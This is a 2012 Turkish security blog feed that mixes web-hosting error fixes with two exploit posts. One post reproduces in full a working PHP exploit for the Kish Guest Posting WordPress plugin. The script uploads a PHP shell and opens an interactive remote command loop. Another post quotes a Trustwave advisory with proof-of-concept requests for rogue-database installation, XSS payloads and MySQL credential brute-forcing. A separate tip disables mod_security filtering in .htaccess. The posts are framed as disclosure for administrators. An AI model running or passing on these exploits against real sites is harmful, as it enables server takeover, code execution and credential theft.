SanalTEAM Internet Security

Twitterde 140 karakter den fazla Mesaj Yazma

bayramozdem — Thu, 15 Mar 2012 12:57:50 +0000

Öncelikle Şuradan programı indiriyorsunuz..
http://qip.ru/download_qip_2012 adresine girip yeşil butona tıklayın.

Daha sonra twitter kısmından Giriş yapıyorsunuz…

Programda Görülen Yere tıklayın…

Aşağıdaki gibi bir mesaj yaz bölümü gelecek.. O kısıma aşağıdaki verilen yazıyı yapıştırın..

Buraya yazacağınız mesajı şu Adresten Kopyalayın: http://pastebin.com/y3D6qvbx

Ve Sonuç

Twitter’ın 140 karakter sınırı Hacked

bayramozdem — Wed, 14 Mar 2012 18:38:22 +0000

Kazak kullanıcı 140 karakterlik Twitter mesaj limitini 930 karakterlik bir mesaj atarak kırdı.

Twitter’ın 140 karakterlik mesaj limiti bazen yetersiz kalıyor tabii ki. Ama bu 140 karakter limitinin olmaması dev bir görüntü ve bilgi kirliliğine de sebep olurdu ve Twitter bugünkü kadar çekici olmazdı diye düşünüyorum. Bu limiti kırmak istediğimizde dış bir web servisi kullanarak, yönlendirme yaparak istediğimiz kadar uzun mesajlar gönderebiliyoruz. Bir Kazak kullanıcı ise “140 karakter de bana mı 140 karakter?” diyerek tam 930 karakterlik bir mesajı Twitter üzerinden takipçilerine göndermiş.

Tabii bu 930 karakterin bir anlamı yok aslında. Kazakistanlı kullanıcı normalde UTF-8 formatında gönderilmesi gereken mesaja CESU-8 formatında karakterler girmeyi başarmış. Normalde Twitter’ın CESU-8 formatlı karakter ayraçlarını kabul etmemesi gerekirken, Anatoly bunu yapmayı başarmış.

Haber görselinde gördüğünüz 930 karakterlik mesaj aslında aşağıdaki metinden ibaret:

Yedek yüklerken SQL hatası ” #1007 – Can’t create database ‘database_ismi’; database exists ” hatası çözümü

bayramozdem — Sun, 04 Mar 2012 20:04:05 +0000

Hazır cms portallarında yedek almak ve yüklemek her zaman riskli ve bir o kadar da zahmetli iş olmuştur. Cms sistemlerinde yedek yüklerken çok sık karşılaşılan bir sorundur. “#1007 – Can’t create database ‘database_ismi’; database exists ” bu sorunu çözmek için çok kolay bir yöntemimiz var.

Bu hata da ”database_ismi database i oluşturulamadı bu database var.” diyor. Phpmyadmin aldığımız sql yedeğimizinin başına ” Veritabanı: `database_ismi`–CREATE DATABASE `database_ismi` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;USE `database_kullanıcıismi`; diye bir satır ekler bu satırı sildiğimiz de aldığımız hatayı bir daha almayacağız.

Unutmayın ki yedeğimizi yüklerken database boş olması gerekir boş olmassa yine bu hatayı alırız. Herhangi bir sorun olursa konu altında yorum ile sorunlarınızı belirtebilirsiniz.

cannot contain ‘..’ to indicate the parent directory Hatası Çözümü

bayramozdem — Sun, 04 Mar 2012 17:03:08 +0000

Aşağıdaki hatayı alanlar iiçin çözüm yolu…. Active Server Pages error ‘ASP 0131′
Disallowed Parent Path
/Inc/includes.asp, line 1
The Include file ‘../xxx.asp’ cannot contain ‘..’ to indicate the parent directory
böyle bir hata veriyorsa parent path hatasıdır.
eğer sunucu sizin değilse ve plesk panel kullanıyorsanız Plesk paneldende ayarlayabiliyorsunuz..
Active Server Pages error ‘ASP 0131′
Disallowed Parent Path
/Inc/includes.asp, line 1
The Include file ‘../Ayarlar.asp’ cannot contain ‘..’ to indicate the parent directory
Bu Hata Server’inizdan Kaynaklanıyor.. Sorunu Çözmek İçin Plesk Panele Giriş Yapın. Web Dizinlerinni Bulun (Resim 1)

Web Dizinlerine girdiğinizde karşınıza aşağıdaki gibi bir sayfa çıkacaktır…

Buradan Ayarlar a girdikten sonra karşınıza son olarak aşağıdaki gibi bir sayfa çıkıyor.

Parent paths etkin kıl seçeceğini aktif yapıyoruz ve tamam diyerek işlemler kaydoluyor. bundan sonra server da bir karakter geri gelinebiliyor..

WordPress 406 Not Acceptable Hatasi

bayramozdem — Wed, 08 Feb 2012 13:10:15 +0000

406 Not Acceptable This request is not acceptable Powered By LiteSpeed Web Server LiteSpeed Technologies

Büyük ihtimalle LiteSpeed serverda wordpress kullanıyor ve post/page içine “image” import ettiğinizde bu hatayı almış olmalısınız. Hatanın çözümü için .htaccess dosyasını kullanmamız gerekiyor. Ftp’den sitenize bağlanıp .htaccess dosyanıza aşağıdaki kodu eklemeniz gerekiyor.

SecFilterEngine Off
SecFilterScanPOST Off

WordPress Kish Guest Posting Plugin 1.0 Arbitrary File Upload

bayramozdem — Thu, 26 Jan 2012 17:40:15 +0000

Kısıtlamasız dosya gönderme açığıdır. Exploid aşağıdaki gibidir.. İnceleyerek gerekli güvenlik önlemlerini almalısınız…



/*

--------------------------------------------------------------------------------

Wordpress Kish Guest Posting Plugin 1.0 (uploadify.php) Unrestricted File Upload

--------------------------------------------------------------------------------
author............: Egidio Romano aka EgiX

mail..............: n0b0d13s[at]gmail[dot]com

software link.....: http://kishpress.com/guest-posting-plugin/
+-------------------------------------------------------------------------+

| This proof of concept code was written for educational purpose only. |

| Use it at your own risk. Author will be not responsible for any damage. |

+-------------------------------------------------------------------------+
[-] vulnerable code in /uploadify/scripts/uploadify.php
26. if (!empty($_FILES)) {

27. $tempFile = $_FILES['Filedata']['tmp_name'];

28. $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';

29. $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];

30. // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);

31. // $fileTypes = str_replace(';','|',$fileTypes);

32. // $typesArray = split('\|',$fileTypes);

33. // $fileParts = pathinfo($_FILES['Filedata']['name']);

34.

35. // if (in_array($fileParts['extension'],$typesArray)) {

36. // Uncomment the following line if you want to make the directory if it doesn't exist

37. // mkdir(str_replace('//','/',$targetPath), 0755, true);

38.

39. move_uploaded_file($tempFile,$targetFile);

40. echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);

41. // } else {

42. // echo 'Invalid file type.';

43. // }

44. }
Restricted access to this script isn't properly realized, so an attacker might be able to upload

arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.
[-] Disclosure timeline:
[19/12/2011] - Vulnerability discovered

[19/12/2011] - Vendor notified through http://kish.in/contact-me/

[07/01/2012] - No response from vendor, notified again via email

[16/01/2012] - After four weeks still no response

[23/01/2012] - Public disclosure
*/
error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);
function http_send($host, $packet)

{

if (!($sock = fsockopen($host, 80)))

die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);

return stream_get_contents($sock);

}
print "\n+----------------------------------------------------------------------------------+";

print "\n| WordPress Kish Guest Posting Plugin 1.0 Unrestricted File Upload Exploit by EgiX |";

print "\n+----------------------------------------------------------------------------------+\n";
if ($argc < 3)

{

print "\nUsage......: php $argv[0]  \n";

print "\nExample....: php $argv[0] localhost /";

print "\nExample....: php $argv[0] localhost /wordpress/\n";

die();

}
$host = $argv[1];

$path = $argv[2];
$payload = "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";

$payload .= "
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}wp-content/plugins/kish-guest-posting/uploadify/scripts/uploadify.php?folder={$path} HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";

$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n");
$packet = "GET {$path}sh.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cmd: %s\r\n";

$packet .= "Connection: close\r\n\r\n";
while(1)

{

print "\nkish-shell# ";

if (($cmd = trim(fgets(STDIN))) == "exit") break;

$response = http_send($host, sprintf($packet, base64_encode($cmd)));

preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");

}
?>

WordPress 3.3.1 Çoklu Güvenlik Açıkları

bayramozdem — Thu, 26 Jan 2012 17:32:15 +0000

WordPressin en Son çıkan güvenlik açığıdır..
Exploid ve bilgiler aşağıda verilmiştir..sistemlerinizdeki açıklarınızı kapatabilirsiniz..

Trustwave’s SpiderLabs Security Advisory TWSL2012-002:

Multiple Vulnerabilities in WordPress

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt

Published: 1/24/12
Version: 1.0

Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior

Product description:
WordPress is a free and open source blogging tool and publishing platform
powered by PHP and MySQL.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: PHP Code Execution and Persistent Cross Site Scripting
Vulnerabilities via ‘setup-config.php’ page.
CVE: CVE-2011-4899

The WordPress ‘setup-config.php’ installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete. However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.

After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor. In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User’s MySQL Instance

1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306

2.) Performs POST/GET Requests to Install WordPress into MySQL Instance

Request #1
———-
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit

Request #2
———-
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

3.) Get PHP Code Execution

Malicious user edits 404.php via Themes Editor as follows:

Note #1: Any php file in the theme could be used.
Note #2: Depending settings, PHP may be used to execute system commands
on webserver.

Malicious user performs get request of modified page to execute code.

Request
——-
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

4.) Get Persistent Cross Site Scripting

Malicious User Injects Malicious Javascript into their own MySQL database instance

MySQL Query
———–
update wp_comments SET
comment_content=’‘ where comment_content=’Hi,
this is a comment.
To delete \ a comment, just log in and view the
post’s comments. There you will have the option to edit or delete
them.’;

Non-malicious User Visits WordPress installation and has Javascript executed on their browser

Request
——-
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Finding 2: Multiple Cross Site Scripting Vulnerabilities in
‘setup-config.php’ page
CVE: CVE-2012-0782

The WordPress ‘setup-config.php’ installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation page
the user is asked to supply the database name, the server that the database
resides on, and a valid MySQL username and password.

During this process, malicious users can supply javascript within
the “dbname”, “dbhost” or “uname” parameters. Upon clicking the submission
button, the javascript is rendered in the client’s browser.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server

Request
——-
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit

Finding 3: MySQL Server Username/Password Disclosure Vulnerability via
‘setup-config.php’ page
CVE: CVE-2011-4898

The WordPress ‘setup-config.php’ installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation page
the user is asked to supply the database name, the server the database resides
on, and a valid MySQL username and password.

Malicious users can omit the “dbname” parameter during this process, allowing
them to continually bruteforce MySQL instance usernames and passwords. This
includes any local or remote MySQL instances which are accessible to the
target web server. This can also be used as a method to proxy MySQL bruteforce
attacks against other MySQL instances outside of the target organization.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server
L.M.N.O = Any MySQL Server for which the Web Server has network access

uname=mysql&pwd=mysql&dbhost=L.M.N.O

Response (If Password is Valid)
——————————-

We were able to connect to the database server (which means your username
and password is okay) but not able to select the database.

Response (If Password is Invalid)
———————————

This either means that the username and password information in your
wp-config.php file is incorrect or we can’t contact the database server at
localhost. This could mean your host’s database server is down.

Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:

“We give priority to a better user experience at the install process. It is
unlikely a user would go to the trouble of installing a copy of WordPress
and then not finishing the setup process more-or-less immediately. The
window of opportunity for exploiting such a vulnerability is very small.”

However, Trustwave SpiderLabs urges caution in situations where the
WordPress installation script is provided as part of a default image.
This is often done as a convenience on hosting providers, even in
cases where the client does not use the software. It is a best practice
to ensure that no installation scripts are exposed to outsiders, and
these vulnerabilities reinforce the importance of this step.

Remediation Steps:
No official fix for these issues will be released for the WordPress
publishing platform. However, administrators can mitigate these issues by
creating strong MySQL passwords and defining rules within a web application
firewall (WAF) solution. ModSecurity (http://www.modsecurity.org/) has
added rules to the commercial rules feed for these issues, and Trustwave’s
vulnerability scanning solution, TrustKeeper, has been updated to detect
exposed installation scripts.

Vendor Communication Timeline:
12/22/11 – Vulnerability disclosed
01/16/12 – Confirmation to release vulnerabilities
01/24/12 – Advisory published

References
1. http://www.wordpress.org

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today’s challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations–ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers–manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave’s SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave’s products and services.

https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

Merhaba dünya!

bayramozdem — Wed, 25 Jan 2012 22:07:22 +0000

WordPress’e hoş geldiniz. Bu sizin ilk yazınız. Bu yazıyı düzenleyin ya da silin. Sonra blog dünyasına adım atın!